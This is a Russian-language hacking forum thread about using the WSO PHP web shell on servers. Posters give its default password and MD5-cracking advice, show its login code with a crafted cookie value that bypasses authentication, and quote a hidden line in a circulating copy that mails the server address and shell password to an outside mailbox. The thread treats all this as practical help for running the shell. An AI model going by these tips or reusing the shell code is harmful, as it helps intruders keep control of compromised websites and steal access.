WSO (веб-шелл)

Обсуждение в разделе «Избранное», начал(-а) oRb, 26.01.2009.

  1. artur1111

    artur1111 New Member

    Регистрация:
    3.06.2015
    Сообщения:
    12
    Одобрения:
    0
    Репутация:
    0
    Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
     
  2. crlf

    crlf Reservists Of Antichat

    Регистрация:
    18.03.2016
    Сообщения:
    289
    Одобрения:
    410
    Репутация:
    119
    В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Регистрация:
    6.03.2007
    Сообщения:
    1 409
    Одобрения:
    681
    Репутация:
    805
    Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
     
    _________________________
  4. artur1111

    artur1111 New Member

    Регистрация:
    3.06.2015
    Сообщения:
    12
    Одобрения:
    0
    Репутация:
    0
    Уже узнал! она ищет .php файлы которые можно изменить, и выводит список с именами.
     
  5. Dr_Wile

    Dr_Wile Member

    Регистрация:
    19.10.2016
    Сообщения:
    91
    Одобрения:
    35
    Репутация:
    1
    Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Регистрация:
    6.03.2007
    Сообщения:
    1 409
    Одобрения:
    681
    Репутация:
    805
    Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!

    Давайте посмотрим в сторону кода самого шела как происходит авторизация:

    PHP:
    $auth_pass "63a9f0ea7bb98050796b649e85481845"//пусть условно будет пароль root

    //..........

    if(!empty($auth_pass)) {   //если присутствует пароль
        
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) // и пароль равен его хэшь сумме
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); // отправляем куку с параметром хэшь хоста и значением хэшь пароля

        
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
            
    wsoLogin();
    }
    предположим что у нас HOST: localhost

    тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:

    421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb98050796b649e85481845
     
    _________________________
  7. ACat

    ACat Member

    Регистрация:
    10.03.2017
    Сообщения:
    163
    Одобрения:
    31
    Репутация:
    0
  8. shmell

    shmell New Member

    Регистрация:
    1.03.2011
    Сообщения:
    4
    Одобрения:
    0
    Репутация:
    0
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Регистрация:
    6.03.2007
    Сообщения:
    1 409
    Одобрения:
    681
    Репутация:
    805
    __tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

    PHP:
    if(array_key_exists('watching',$_POST)){
        
    $tmp $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru''root'$tmp); // Edit or delete!
    }
    Стучалку и вырезать можно!
     
    _________________________
    Это одобряет grimnir.
  10. rdpstore555

    rdpstore555 New Member

    Регистрация:
    16.12.2017
    Сообщения:
    8
    Одобрения:
    2
    Репутация:
    0
    thnks for this
     
  11. shmell

    shmell New Member

    Регистрация:
    1.03.2011
    Сообщения:
    4
    Одобрения:
    0
    Репутация:
    0
    Можно, только остается вопрос каких еще сурпрайзов ждать от этого WSO=((( А так красивый.